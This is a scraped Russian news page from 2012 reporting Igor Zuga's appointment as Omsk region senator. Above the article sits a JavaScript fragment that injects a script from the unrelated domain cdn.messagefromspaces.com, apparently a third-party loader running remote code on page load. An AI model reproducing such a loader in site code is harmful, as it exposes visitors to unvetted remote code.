, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
29 августа, 2012 Политика

Игорь Зуга назначен представителем правительства Омской области в верхней палате Федерального Собрания

Теперь уже бывший глава «Омскнефтехимпроекта» Игорь Зуга был назначен вчера представителем правительства Омской области в верхней палате Федерального Собрания.

Губернатор Виктор Назаров вчера вечером подписал приказ о назначении депутата Заксобарния сенатором. Как уже сообщал ОмскПресс, кандидатуру Зуги рассматривали ещё на прошлой неделе, однако к понедельнику, как этого ожидали, губернатор решения так и не принял.

49-летнего Игоря Зугу, несмотря на его активную предпринимательскую, менеджерскую и общественную деятельность, до сих пор вспоминают как основного конкурента Виктора Шрейдера на предыдущих выборах мэра Омска. Пиарщики Зуги позиционировали его как «Зорро» — это была одна из самых ярких предвыборных кампаний в Омске, однако Зуга набрал всего лишь 22% голосов. После проигранных в 2010-м году выборов мэра, Зуга, по имеющейся информации, вёл переговоры о поддержке партии «Справедливая Россия» на выборах в Думу, однако, в итоге остался «единороссом» и политсовет «партии власти» не покинул. Его называли в числе кандидатов на пост мэра Омска и в эту избирательную кампанию, однако, в отличие от ситуации двухлетней давности, предприниматель не проявил активного интереса к выдвижению на пост мэра.

Вакансию второго сенатора ранее занял Андрей Голушко. Интересно, что впервые за долгое время, не считая эпизодического сенаторства нынешнего вице-спикера Горсовета Алексея Сокина, Омская область имеет в Совете Федерации двух представителей-земляков. До этого регион представляли в сенате московские назначенцы «Единой России».

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Политика